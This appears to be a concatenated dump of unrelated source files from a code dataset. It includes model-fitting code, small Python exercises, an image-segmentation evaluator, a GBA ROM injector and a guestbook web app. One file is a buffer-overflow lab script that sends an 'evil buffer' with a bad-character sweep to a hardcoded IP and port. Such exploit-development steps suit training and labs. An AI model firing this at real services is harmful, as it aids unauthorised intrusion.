print(xTrain)\n \n\n","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"216343809","text":"import numpy as np\nimport scipy.optimize as op\nimport time\nfrom functools import partial\nfrom copy import deepcopy\nfrom multiprocessing import Pool, cpu_count\nfrom . import RL_utils as ru\nfrom . import utility as ut\n\n# -------------------------------------------------------------------------------------\n# Fitting\n# -------------------------------------------------------------------------------------\n\ndef per_subject_fit(sessions, agent, max_change = 0.01, parallel = False):\n ''' Fit agent model seperately to sessions from each subject. Returns list\n of subject fits, each of which is a population_fit.\n '''\n subject_fits = []\n sIDs = sorted(set([s.subject_ID for s in sessions]))\n for sID in sIDs:\n subject_sessions = [s for s in sessions if s.subject_ID == sID]\n subject_fit = fit_population(subject_sessions, agent, max_change = 0.01, parallel = parallel)\n subject_fit['sID'] = sID\n subject_fits.append(subject_fit)\n return subject_fits\n\n\ndef longitudinal_fit(experiment, agent, epoch_len = 4, max_iter = 15):\n '''Perform population fitting longditudinally through an experiment doing \n population_fit on non-overlapping epochs each containing epoch_len days.'''\n epoch_start_days = list(range(1,experiment.n_days, epoch_len))\n epoch_fits = []\n for start_day in epoch_start_days:\n epoch_sessions = experiment.get_sessions('all',list(range(start_day,start_day + epoch_len)))\n population_fit = fit_population(epoch_sessions, agent, max_iter)\n population_fit['start_day'] = start_day\n epoch_fits.append(population_fit)\n return epoch_fits\n\n\ndef fit_population(sessions, agent, max_iter = 200, min_iter = 2, repeats = 5, pop_init_params = None,\n eval_BIC = False, verbose = False, max_change = 0.01, parallel = False):\n ''' Fits population level parameters using the Expectation Maximisation \n method from Huys et al. \n ''' \n\n start_time = time.time()\n\n # If agent selects subset of trials for fitting, exclude sessions for which agent \n # trial selection criterion does not select any trials. \n\n if hasattr(agent,'_select_trials') and bool(agent.trial_select):\n n_ses = len(sessions)\n sessions = [s for s in sessions if sum(agent._select_trials(s)) > 0]\n n_excluded = n_ses - len(sessions)\n else:\n n_excluded = 0\n \n #param_evol variable stores values of the population parameters as they evolve during the EM fitting.\n param_evol = {'means' : [], 'vars' : [], 'liks' : [],\n 'means_T' : [], 'upper_conf_T': [], 'lower_conf_T': [],\n 'means_U' : [], 'upper_conf_U': [], 'lower_conf_U': []} \n\n # Initialise prior for first round of MAP.\n if pop_init_params: \n print('Initial paramter estimate provided.')\n pop_means = pop_init_params['means']\n pop_vars = pop_init_params['SDs']**2\n else:\n pop_means = np.zeros(agent.n_params)\n pop_vars = np.ones(agent.n_params) * 6.25\n\n\n if parallel: # Set up parallel processing pool of workers. \n if parallel == True:\n p = Pool(cpu_count())\n else:\n p = Pool(parallel)\n\n if hasattr(agent,'_get_session_predictors'):\n # Precalculate predictors for logistic regression agents, note:\n # not currently using multiprocessing as can't pickle instancemethod.\n for session in sessions:\n session.predictors = agent._get_session_predictors(session)\n\n k = 1\n while k <= max_iter:\n\n # E - Step: Evaluate the new posterior distribution of the subject \n # parameters used to calculate expectation of log likelihood.\n\n print(('\\nMaximum a posteriori fitting... Round: ' + str(k)), end=' ')\n\n MAP_fit_func = partial(fit_session, agent = agent , pop_means = pop_means,\n pop_vars = pop_vars, repeats = repeats, verbose = verbose)\n\n if parallel:\n MAP_fits = p.map(MAP_fit_func, sessions)\n else:\n MAP_fits = list(map(MAP_fit_func, sessions))\n\n for session, fit in zip(sessions, MAP_fits):\n session.init_params_U = fit['params_U'] # Store session fits as inital parameters for next round of fitting.\n\n\n pop_likelihood = np.sum(np.array([fit['likelihood'] for fit in MAP_fits]))\n sub_params_U = np.array([fit['params_U'] for fit in MAP_fits]) \n sub_diag_hess = np.array([fit['diag_hess'] for fit in MAP_fits])\n\n sub_diag_hess[sub_diag_hess > -1e-15] = -1e-15 # Set any hessians that are 0 to small negative \n # value to prevent divide by zero error.\n\n # M - step: Adjust population distribution mean and variance to \n # maximise the expectation of the log likelihood.\n\n pop_means = np.mean(sub_params_U, 0)\n pop_vars = np.mean(sub_params_U ** 2 + 1. / -sub_diag_hess, 0) - pop_means ** 2.\n \n if verbose: # Print info about hessians as sanity check.\n max_index = np.unravel_index(np.argmax(sub_diag_hess),np.shape(sub_diag_hess))\n print(('Maximum sub_diag_hess: {:.4} , at session: {}, param: {}, param value U: {:.4}'\n .format(np.max(sub_diag_hess), max_index[0], max_index[1], sub_params_U[max_index])))\n\n # Store information about population parameter evolution.\n\n param_evol['means'].append(pop_means)\n param_evol['vars'].append(pop_vars)\n param_evol['liks'].append(pop_likelihood)\n\n err_bar_2_SD = 2. * np.sqrt(pop_vars) \n param_evol['means_T'].append(ru.trans_UT(pop_means, agent.param_ranges)) \n param_evol['upper_conf_T'].append(ru.trans_UT(pop_means + err_bar_2_SD, agent.param_ranges))\n param_evol['lower_conf_T'].append(ru.trans_UT(pop_means - err_bar_2_SD, agent.param_ranges))\n\n #Test for convergence: Evaluate maximum change in mean and 95% confidence intervals in true space. \n if k >= min_iter: \n max_param_change = np.max(np.abs([param_evol['means_T'][-1 ] - param_evol['means_T'][-2],\n param_evol['upper_conf_T'][-1] - param_evol['upper_conf_T'][-2],\n param_evol['lower_conf_T'][-1] - param_evol['lower_conf_T'][-2]]))\n print(('Max change T: {:.4}'.format(max_param_change)), end=' ')\n if max_param_change < max_change:\n print ('\\nEM fitting Converged.')\n break\n\n k += 1\n repeats = 1 # Only use multiple initial values for gradient descent on first round, then initialise with previous values.\n\n print(('Elapsed time: ' + str(time.time() - start_time)))\n\n if parallel:p.close()\n\n for session, MAP_fit in zip(sessions, MAP_fits):\n del session.init_params_U # Remove fitting initial params from sessions.\n if hasattr(session, 'subject_ID'):\n MAP_fit['sID'] = session.subject_ID # Record animal ID on MAP fits.\n\n pop_params = {'means' : pop_means, 'SDs' : np.sqrt(pop_vars), 'ranges': agent.param_ranges}\n if hasattr(agent,'param_names'): pop_params['names'] = agent.param_names\n\n population_fit = {'MAP_fits' : MAP_fits,\n 'pop_params' : pop_params,\n 'param_evol' : param_evol,\n 'agent_name' : agent.name,\n 'param_names' : agent.param_names,\n 'n_trials' :[s.n_trials for s in sessions]}\n\n if hasattr(sessions[0], 'true_params_T'):\n # If simulated data, store true values of parameters in population_fit\n population_fit['true_values'] = {'params_U' : [session.true_params_U for session in sessions],\n 'params_T' : [session.true_params_T for session in sessions]} \n population_fit['pop_params_true'] = sessions[0].pop_params_true\n population_fit['param_names_true'] = sessions[0].param_names\n \n if eval_BIC: \n if eval_BIC == True: eval_BIC = 100 # Default to 100 draws if True passed in as eval_BIC argument.\n print(('Evaluating integrated BIC score, n_draws: {}'.format(eval_BIC)))\n BIC_score, integrated_likelihood, choice_prob = evaluate_BIC(sessions, agent, pop_params, eval_BIC, parallel)\n population_fit['BIC_score'] = BIC_score\n population_fit['choice_prob'] = choice_prob\n population_fit['integrated_likelihood'] = integrated_likelihood\n population_fit['MAP_likelihood'] = evaluate_MAP_fit_likelihood(population_fit,sessions,agent)\n\n if hasattr(sessions[0],'predictors'):\n for session in sessions:\n del session.predictors\n\n if n_excluded > 0:\n print(('{} of {} sessions excluded by agent trial selection criterion.'.format(n_excluded, n_ses)))\n\n return population_fit\n\ndef fit_session(session, agent, pop_means = None, pop_vars = None, repeats = 3, verbose = False):\n '''Find maximum a posteriori parameter values for agent for given session and means and variances of \n population level prior distributions. '''\n\n if pop_means is None: # No prior passed in, use (almost completely) uninformative prior.\n pop_means = np.zeros(agent.n_params)\n pop_vars = np.ones(agent.n_params) * 100.\n\n use_init_params = hasattr(session, 'init_params_U')\n\n fit_func = lambda params_U: session_log_posterior(params_U, session, agent, pop_means, pop_vars, sign = - 1.)\n\n good_fit_found = False\n while not good_fit_found: # Check based on positive values of hessian.\n\n fits = []\n for i in range(repeats): # Perform fitting. \n if use_init_params:\n init_params_U = session.init_params_U\n else:\n init_params_U = ru.random_params(agent.param_ranges)\n \n fits.append(op.minimize(fit_func, init_params_U, jac = agent.calculates_gradient,\n options = {'disp': verbose, 'gtol': 1e-7})) \n use_init_params = False # Only use provided initial parameters for first repeat.\n\n fit = fits[np.argmin([f['fun'] for f in fits])] # Select best fit out of repeats.\n hess_func = lambda params_U: session_log_posterior(params_U, session, agent, pop_means, pop_vars, sign = 1., eval_grad = False)\n\n hessdiag = ru.Hess_diag(hess_func, fit['x'], 1e-4)\n\n if np.max(hessdiag) > 0.:\n print('Bad fit. Repeating.')\n else:\n good_fit_found = True\n\n session_fit = {'params_U' : fit['x'],\n 'params_T' : ru.trans_UT(fit['x'], agent.param_ranges),\n 'likelihood' : - fit['fun'], \n 'diag_hess' : hessdiag} \n\n return session_fit\n\ndef session_log_posterior(params_U, session, agent, pop_means, pop_vars, eval_grad = True, sign = 1.):\n '''Evaluates the log posterior probability of behaviour in a single session \n for a given set of parameter values and population level mean and variances.\n '''\n\n params_T = ru.trans_UT(params_U, agent.param_ranges)\n\n log_prior_prob = - (len(params_U) / 2.) * np.log(2 * np.pi) - np.sum(np.log(pop_vars)) / 2. \\\n - sum((params_U - pop_means) ** 2. / (2 * pop_vars))\n\n if agent.calculates_gradient and eval_grad:\n log_likelihood, log_likelihood_gradient_T = agent.session_likelihood(session, params_T, eval_grad = True)\n\n log_likelihood_gradient_U = ru.trans_grad_TU(params_T, log_likelihood_gradient_T, agent.param_ranges)\n\n log_prior_prob_gradient = ((pop_means - params_U) / pop_vars)\n\n log_posterior_prob = log_likelihood + log_prior_prob\n log_posterior_grad = log_likelihood_gradient_U + log_prior_prob_gradient\n\n return (sign * log_posterior_prob, sign * log_posterior_grad)\n\n else:\n\n log_likelihood = agent.session_likelihood(session, params_T)\n\n log_posterior_prob = log_likelihood + log_prior_prob\n\n return (sign * log_posterior_prob)\n\ndef evaluate_MAP_fit_likelihood(population_fit, sessions, agent):\n data_log_likelihood = 0 \n for MAP_fit, session in zip(population_fit['MAP_fits'],sessions):\n data_log_likelihood += agent.session_likelihood(session, MAP_fit['params_T'])\n return data_log_likelihood\n\n\ndef evaluate_BIC(sessions, agent, pop_params, n_draws = 100, parallel = True):\n '''Return the integrated BIC score for given agent model, sessions\n & agent population parameter distribution.'''\n\n if 'pop_params' in list(pop_params.keys()): # allow population fit to be passed in instead of pop_params\n pop_params = pop_params['pop_params']\n\n int_func = partial(_session_integrated_log_likelihood, agent = agent, pop_params = pop_params, n_draws = n_draws)\n\n if parallel:\n p = Pool(cpu_count())\n integrated_likelihood = np.sum(p.map(int_func, sessions))\n p.close()\n else:\n integrated_likelihood = np.sum(list(map(int_func, sessions)))\n \n n_params = 2 * agent.n_params # Factor of 2 as each agent param has mean and variance as population params.\n if hasattr(agent,'_select_trials') and bool(agent.trial_select):\n n_trials = sum([sum(agent._select_trials(s)) for s in sessions])\n else:\n n_trials = sum([s.n_trials for s in sessions])\n\n BIC_score = - 2. * integrated_likelihood + n_params * np.log(n_trials)\n\n choice_prob = np.exp(integrated_likelihood/n_trials)\n return (BIC_score, integrated_likelihood, choice_prob)\n\ndef _session_integrated_log_likelihood(session, agent, pop_params, n_draws):\n '''Estimate integrated log likelihood for one session by importance sampling.'''\n log_likelihood_samples = np.zeros(n_draws)\n for i in range(n_draws):\n sample_params_T = ru.sample_params_T_from_pop_params(pop_params, agent)\n log_likelihood_samples[i] = agent.session_likelihood(session, sample_params_T)\n # Subtract maximum log likelihood sample from each sample before taking exponent to\n # protect against exponent returning zero for large negative log likelihoods.\n max_log_lik_sample = max(log_likelihood_samples) \n session_int_log_lik = max_log_lik_sample + \\\n np.log(np.sum(np.exp(log_likelihood_samples - \\\n max_log_lik_sample))/n_draws)\n return session_int_log_lik\n\n\ndef grad_check(session, agent, params_T = [], verbose = True):\n 'Check analytical likelihood gradient returned by agent.'\n if len(params_T) == 0:\n params_T = ru.random_params(agent.param_ranges, return_T = True)\n fit_func = lambda params_T: agent.session_likelihood(session, params_T, eval_grad = True)\n lik_func = lambda params_T: fit_func(params_T)[0]\n grad_func = lambda params_T: fit_func(params_T)[1]\n l2error = op.check_grad(lik_func, grad_func, params_T)\n if verbose:\n print(('Error between finite difference and analytic derivatives = ' + str(l2error)))\n if l2error > 1e-3:\n print(('Params_T: {}'.format(agent.get_params_T())))\n else:\n return(l2error, params_U)\n\n","sub_path":"pedro/code/Two_step_bak/model_fitting.py","file_name":"model_fitting.py","file_ext":"py","file_size_in_byte":15190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"130466831","text":"'''\nЗадача «Удаление фрагмента»\nУсловие\nДана строка, в которой буква h встречается минимум два раза. Удалите из этой строки первое и последнее вхождение буквы h, а также все символы, находящиеся между ними.\n'''\ns = input()\n# s = '123h56h7'\ns1 = s[:]\nind1 = s1.find('h')\n# ind2 = s1[ind1 + 1:].find('h') + ind1 # замудрился\nind2 = s1.rfind('h')\nprint(s[:ind1] + s[ind2 + 1:])\n","sub_path":"001703StepPyStudy/Step001703PyStudyсh05_strings_TASK07_20210222_delChunk.py","file_name":"Step001703PyStudyсh05_strings_TASK07_20210222_delChunk.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"372778661","text":"import socket\n\nip = \"10.10.46.154\"\nport = 1337\n\nprefix = b\"OVERFLOW1 \"\noffset = 1978\noverflow = b\"A\" * offset\nretn = b\"BBBB\"\npadding = b\"\"\n\nbad_chars = [0]\npayload = b''.join([bytes([i]) for i in range(0,256) if i not in bad_chars])\npostfix = b\"\"\n\nbuffer = prefix + overflow + retn + padding + payload + postfix\n# print(buffer)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.connect((ip, port))\n print(\"Sending evil buffer...\")\n s.send(buffer + b\"\\r\\n\")\n print(\"Done!\")\nexcept Exception as e:\n print(e)\n print(\"Could not connect.\")\n","sub_path":"OVERFLOW1/3.BadChars.py3","file_name":"3.BadChars.py3","file_ext":"py3","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"248635506","text":"class TrendUp:\n def __init__(self, df, params):\n self.df = df\n self.H = self.df[\"high\"]\n self.L = self.df[\"low\"]\n self.numPeriods = params[\"numPeriods\"] if \"numPeriods\" in params.keys() else 3\n self.coef = params[\"coef\"] if \"coef\" in params.keys() else 1\n self.attrName = params[\"attrName\"] if \"attrName\" in params.keys() else \"trendUp\"\n\n def run(self):\n trendList = [False for _ in range(len(self.df))]\n for i in range(self.numPeriods, len(self.df)):\n isTrendHigh = False not in [\n True if self.coef * self.H.iloc[j] > self.H.iloc[j - 1] else False\n for j in range(i - self.numPeriods, i)\n ]\n isTrendLow = False not in [\n True if self.coef * self.L.iloc[j] > self.L.iloc[j - 1] else False\n for j in range(i - self.numPeriods, i)\n ]\n trendList[i] = isTrendHigh and isTrendLow\n return [(self.attrName, trendList)]\n","sub_path":"Backtest/main/Attributes/lib/TrendUp.py","file_name":"TrendUp.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"426644798","text":"def divide(a,b):\r\n return a/b\r\n\r\ntry:\r\n c=divide(5, 0)\r\nexcept ZeroDivisionError:\r\n print(\"두번째 인자는 0이어서는 안 됩니다.\")\r\nexcept TypeError:\r\n print(\"모든 인자는 숫자여야 합니다.\")\r\nexcept:\r\n print(\"음~ 무슨 에러인지 모르겠어요!\")\r\n\r\n","sub_path":"python6/예외처리2.py","file_name":"예외처리2.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"49474500","text":"from threading import Thread\nimport time\n\n\n# num = 1\ng_num = [11, 22, 33]\n\n\ndef worker_1(num):\n # global num\n # for i in range(3):\n # num += 1\n num.append(44)\n print('worker_1 num: ', num)\n\n\ndef worker_2(num):\n # global num\n print('worker_2 num: ', num)\n\n\nprint('---start num=%s-------' % g_num)\nt1 = Thread(target=worker_1, args=(g_num, ))\nt1.start()\n\ntime.sleep(2)\n\nt2 = Thread(target=worker_2, args=(g_num, ))\nt2.start()","sub_path":"07_older/18_global.py","file_name":"18_global.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"426400681","text":"import os\nimport glob\nimport argparse\n\nfrom tqdm import tqdm\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom models import Deeplabv3Resnet50, Deeplabv3Resnet101\nfrom utils.dataset import SegmentationDataset\n\nfrom utils.losses import DiceLoss\nfrom utils.metrics import IoU, Accuracy, Precision, Recall, Fscore\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-pt', '--pt', type=str, required=True)\n parser.add_argument('-vip', '--val_image_path', type=str, required=True)\n parser.add_argument('-vlp', '--val_label_path', type=str, required=True)\n parser.add_argument('-cls', '--classes', type=str, required=True)\n\n parser.add_argument('--no-cuda', action='store_true')\n parser.add_argument('-s', '--size', type=int, default=300)\n\n parser.add_argument('--backbone', type=str, default='resnet50', choices=['resnet50', 'resnet101'])\n parser.add_argument('--num-workers', type=int, default=4)\n\n args = parser.parse_args()\n print(args)\n\n device = 'cuda' if (torch.cuda.is_available() and not (args.no_cuda)) else 'cpu'\n print(f'Device : {device}')\n\n classes = open(args.classes, 'r').read().splitlines()\n\n val_images = glob.glob(os.path.normpath(args.val_image_path) + '/*.jpg')\n val_masks = glob.glob(os.path.normpath(args.val_label_path) + '/*.png')\n val_images.sort()\n val_masks.sort()\n\n if args.backbone == 'resnet50':\n model = Deeplabv3Resnet50(len(classes)).to(device)\n else:\n model = Deeplabv3Resnet101(len(classes)).to(device)\n\n model.load_state_dict(torch.load(args.pt))\n model = model.eval()\n\n dice_loss = DiceLoss()\n\n iou_metric = IoU()\n accuracy_metric = Accuracy()\n precision_metric = Precision()\n recall_metric = Recall()\n f_score_metric = Fscore()\n\n val_dataset = SegmentationDataset(val_images, val_masks, classes, args.size, False)\n val_dataloader = DataLoader(val_dataset, batch_size=1, shuffle=False, num_workers=args.num_workers)\n\n sum_losses = 0\n sum_iou_metric = 0\n sum_accuracy_metric = 0\n sum_precision_metric = 0\n sum_recall_metric = 0\n sum_f_score_metric = 0\n\n desc = f'Eval'\n for images, masks in tqdm(val_dataloader, desc=desc):\n with torch.no_grad():\n images = images.to(device)\n masks = masks.to(device)\n\n with torch.cuda.amp.autocast():\n results = model(images)\n\n sum_losses += dice_loss(results, masks)\n sum_iou_metric += iou_metric(results, masks).item()\n sum_accuracy_metric += accuracy_metric(results, masks).item()\n sum_precision_metric += precision_metric(results, masks).item()\n sum_recall_metric += recall_metric(results, masks).item()\n sum_f_score_metric += f_score_metric(results, masks).item()\n\n sum_losses /= len(val_dataloader)\n sum_iou_metric /= len(val_dataloader)\n sum_accuracy_metric /= len(val_dataloader)\n sum_precision_metric /= len(val_dataloader)\n sum_recall_metric /= len(val_dataloader)\n sum_f_score_metric /= len(val_dataloader)\n\n print(f'Final results')\n print(f'Loss: {round(sum_losses, 5)}')\n print(f'IoU: {round(sum_iou_metric, 3)}')\n print(f'Accuracy: {round(sum_accuracy_metric, 3)}')\n print(f'Precision: {round(sum_precision_metric, 3)}')\n print(f'Recall: {round(sum_recall_metric, 3)}')\n print(f'F score: {round(sum_f_score_metric, 3)}')\n","sub_path":"eval_deeplabv3_resnet50.py","file_name":"eval_deeplabv3_resnet50.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"20007199","text":"#!/usr/bin/env python3\nimport\tos\nimport\tsys\nsys.path.append(os.path.join(os.path.dirname(__file__), 'easygui-0.98.0-py3.5.egg'))\nimport\teasygui as eg\n\nimport\tinject_gba_cli as myapp\n\napp_name = 'GBA injection wizard'\napp_title = app_name\n\nchoose_task_text ='''This tool provides a simplified interface to:\n\n* Decrypt, decompress, and unpack an alldata.psb.m/alldata.bin file,\n\n* Extract or replace the ROM file\n\n* Repack, compress, and encrypt a new alldata.psb.m/alldata.bin file.\n\n\nWhat do you want to do?'''\nchoose_task_choices = [\n\t'Extract ROM',\n\t'Inject ROM',\n\t'Quit',\n\t]\n\ninject_choose_inrom_text = '''Choose your input ROM'''\ninject_choose_inpsb_text = '''Choose your input alldata.psb.m'''\ninject_choose_outpsb_text = '''Choose your output alldata.psb.m'''\ninject_confirm_text = '''\nInject a ROM into a .psb.m file\n\nWe are about to inject this rom:\n{rom}\n\ninto this psb:\n{inpsb}\n\nand save the result as:\n{outpsb}\n\n'''\n\nextract_choose_inpsb_text = '''Choose your input alldata.psb.m'''\nextract_choose_outrom_text = '''Choose your output ROM'''\nextract_confirm_text = '''\nExtract the ROM from a .psb.m file\n\nWe are about to extract the ROM from this psb:\n{inpsb}\n\nand save the ROM as:\n{outrom}\n\n'''\n\n\nstate = 'choose_task'\nwhile state:\n\tif state == 'choose_task':\n\t\tapp_title = app_name + ' - Choose Task'\n\t\trv = eg.buttonbox(choose_task_text, app_title, choose_task_choices)\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\texit(0)\n\t\tif rv == choose_task_choices[0]:\n\t\t\tstate = 'extract'\n\t\telif rv == choose_task_choices[1]:\n\t\t\tstate = 'inject'\n\t\telif rv == choose_task_choices[2]:\n\t\t\tstate = 'quit'\n\t\t\texit(0)\n\telif state == 'extract':\n\t\t# Hidden state to clear our filenames\n\t\tapp_title = 'Extract ROM'\n\t\tinpsb = ''\n\t\toutrom = ''\n\t\tstate = 'extract_choose_inpsb'\n\telif state == 'extract_choose_inpsb':\n\t\trv = eg.fileopenbox(extract_choose_inpsb_text, app_title, filetypes=['*', ['*.psb.m', 'psb.m files']])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tinpsb = rv\n\t\t\tstate = 'extract_choose_outrom'\n\telif state == 'extract_choose_outrom':\n\t\trv = eg.filesavebox(extract_choose_outrom_text, title=app_title, default='gba.rom', filetypes=['*.rom', '*.gba'])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\toutrom = rv\n\t\t\tstate = 'extract_confirm'\n\telif state == 'extract_confirm':\n\t\trv = eg.ccbox(extract_confirm_text.format(inpsb=inpsb, outrom=outrom), app_title)\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tmypsb = myapp.load_from_psb(inpsb)\n\t\t\tmyapp.write_rom(mypsb, outrom)\n\t\t\tstate = 'choose_task'\n\telif state == 'inject':\n\t\t# Hidden state to clear our filenames\n\t\tapp_title = 'Inject ROM'\n\t\tinrom = ''\n\t\tinpsb = ''\n\t\toutpsb = ''\n\t\tstate = 'inject_choose_rom'\n\telif state == 'inject_choose_rom':\n\t\trv = eg.fileopenbox(inject_choose_inrom_text, app_title, filetypes=['*.rom', '*.gba'])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tinrom = rv\n\t\t\tstate = 'inject_choose_inpsb'\n\telif state == 'inject_choose_inpsb':\n\t\trv = eg.fileopenbox(inject_choose_inpsb_text, app_title, filetypes=[['*.psb.m', 'psb.m files']])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tinpsb = rv\n\t\t\tstate = 'inject_choose_outpsb'\n\telif state == 'inject_choose_outpsb':\n\t\trv = eg.filesavebox(inject_choose_outpsb_text, title=app_title, default='alldata.psb.m', filetypes=[['*.psb.m', 'psb.m files']])\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\toutpsb = rv\n\t\t\tstate = 'inject_confirm'\n\telif state == 'inject_confirm':\n\t\trv = eg.ccbox(inject_confirm_text.format(rom=inrom, inpsb=inpsb, outpsb=outpsb), app_title)\n\t\tprint(type(rv), rv)\n\t\tif not rv or rv == '':\n\t\t\tstate = 'choose_task'\n\t\telse:\n\t\t\tmypsb = myapp.load_from_psb(inpsb)\n\t\t\tmyapp.read_rom(mypsb, inrom)\n\t\t\tmyapp.write_psb(mypsb, outpsb)\n\t\t\tmyapp.write_bin(mypsb, outpsb)\n\t\t\tstate = 'choose_task'\n\telse:\n\t\tprint(\"Unknown state '%s'\" % state)\n\t\texit(1)\n","sub_path":"inject_gba_gui.py","file_name":"inject_gba_gui.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"59191915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 3 17:05:43 2018\n\n@author: Jason\n\"\"\"\n\ndef removeChars(arr, string):\n \n hashTable ={}\n \n # for each character in the array, assign true to the value with c as the key\n for c in arr:\n hashTable[c] = True\n \n result = ''\n \n # for c in the string, if c is not in the hash table the append to result\n for c in string:\n if c not in hashTable:\n result += c\n \n return result\n\ntchars = ['h', 'e', 'w', 'o'];\ntstring = 'hello world';","sub_path":"removeChars.py","file_name":"removeChars.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"232650571","text":"#!/usr/bin/env python\nfrom datetime import datetime\nimport os\nimport jinja2\nimport webapp2\nfrom models import Guest\nfrom google.appengine.api import users\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), \"templates\")\njinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=False)\n\n\nclass BaseHandler(webapp2.RequestHandler):\n\n def write(self, *a, **kw):\n return self.response.out.write(*a, **kw)\n\n def render_str(self, template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\n def render(self, template, **kw):\n return self.write(self.render_str(template, **kw))\n\n def render_template(self, view_filename, params=None):\n if not params:\n params = {}\n template = jinja_env.get_template(view_filename)\n return self.response.out.write(template.render(params))\n\n\nclass MainHandler(BaseHandler):\n def get(self):\n user = users.get_current_user()\n\n if user:\n logiran = True\n logout_url = users.create_logout_url('/')\n params = {\"logiran\": logiran, \"logout_url\": logout_url, \"user\": user}\n else:\n logiran = False\n login_url = users.create_login_url('/')\n\n params = {\"logiran\":logiran, \"login_url\": login_url, \"user\": user}\n\n return self.render_template(\"hello.html\", params=params)\n\n\nclass VnosHandler(BaseHandler):\n def post(self):\n ime_priimek = self.request.get(\"ImePriimek\")\n if ime_priimek == \"\":\n ime_priimek = \"neznanec\"\n e_posta = self.request.get(\"E_mail\")\n message_ = self.request.get(\"Message\")\n\n guest = Guest(ImePriimek = ime_priimek, E_mail = e_posta, Message = message_)\n guest.put()\n\n self.write(\"Hvala za sporocilo. Vas kontaktiramo v kratkem!\")\n self.redirect_to(\"seznam-gostov\")\n\nclass SeznamGostovHandler(BaseHandler):\n def get(self):\n seznam = Guest.query(Guest.izbrisan == False).fetch()\n params = {\"seznam\": seznam}\n self.render_template(\"seznam_gostov.html\", params=params)\n\n\nclass PosamezniGostHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"posamezni_gost.html\", params=params)\n\nclass UrediMessageHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"uredi_message.html\", params=params)\n\n def post(self, guest_ID):\n Message = self.request.get(\"Message\")\n guest = Guest.get_by_id(int(guest_ID))\n guest.Message = Message\n guest.put()\n self.redirect_to(\"seznam-gostov\")\n\nclass IzbrisiMessageHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"izbrisi_message.html\", params=params)\n\n def post(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n guest.izbrisan = True\n guest.put()\n self.redirect_to(\"seznam-gostov\")\n\nclass IzbrisaniHandler(BaseHandler):\n def get(self):\n seznam = Guest.query(Guest.izbrisan == True).fetch()\n params = {\"seznam\": seznam}\n self.render_template(\"izbrisani.html\", params=params)\n\nclass ObnoviHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n guest.izbrisan = False\n guest.put()\n self.redirect_to(\"seznam-gostov\")\n\nclass TrajnoIzbrisiHandler(BaseHandler):\n def get(self, guest_ID):\n guest = Guest.get_by_id(int(guest_ID))\n params = {\"guest\": guest}\n self.render_template(\"trajno_izbrisi.html\", params=params)\n\n def post(self, guest_ID): #se ne izbrise zares\n guest = Guest.get_by_id(int(guest_ID))\n guest.key.delete()\n self.redirect_to(\"izbrisani\")\n\n\napp = webapp2.WSGIApplication([\n webapp2.Route('/', MainHandler),\n webapp2.Route('/vnos', VnosHandler),\n webapp2.Route('/seznam-gostov', SeznamGostovHandler, name = \"seznam-gostov\"),\n webapp2.Route('/guest/', PosamezniGostHandler),\n webapp2.Route('/guest//uredi', UrediMessageHandler),\n webapp2.Route('/guest//izbrisi', IzbrisiMessageHandler),\n webapp2.Route('/izbrisani', IzbrisaniHandler, name = \"izbrisani\"),\n webapp2.Route('/guest//obnovi', ObnoviHandler),\n webapp2.Route('/guest//trajno_izbrisi', TrajnoIzbrisiHandler),\n], debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 